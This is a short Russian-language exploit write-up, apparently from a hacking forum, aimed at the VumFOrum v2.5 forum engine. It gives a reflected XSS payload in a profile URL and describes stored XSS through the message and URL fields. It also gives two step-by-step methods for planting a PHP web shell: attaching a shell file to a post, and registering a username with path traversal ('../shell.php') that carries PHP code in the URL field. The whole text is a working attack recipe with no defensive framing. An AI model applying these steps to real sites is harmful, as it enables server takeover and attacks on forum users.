Форум: VumFOrum
Версия: v2.5
Пасcивная XSS:
Код:
http://site.ru/?forum=profile&user=<script>alert();</script>
Активная XSS:
1) В поле
Сообщение вводим скрипт, скрипт будет выполняться при просмотре темы.
2) При регистрации пользователя в поле
Url вводим текст скрипта, скрипт будет выполняться при просмотре профиля пользователя.
Заливка шелла:
Способ 1:
При создание темы/сообщения прикрепляем файл - шелл.
Шелл будет доступен по адресу:
http://site.ru/upload/shell.php
Способ 2:
При регистрации на форуме, в поле
Имя введите
../shell.php, в поле
пароль и его подтверждение введите 1, в поле
Mail 1@1, в поле
Url введите код шелла (к примеру <? echo(1); ?>).
Шелл будет доступен по адресу:
http://site.ru/shell.php
Если прав на заливку шелла в эту директорию не хватит, то можно попробывать залить шелл в директорию upload:
При регистрации на форуме, в поле
Имя введите
../upload/shell.php, в поле
пароль и его подтверждение введите 1, в поле
Mail 1@1, в поле
Url введите код шелла (к примеру <? echo(1); ?>).
Шелл будет доступен по адресу:
http://site.ru/upload/shell.php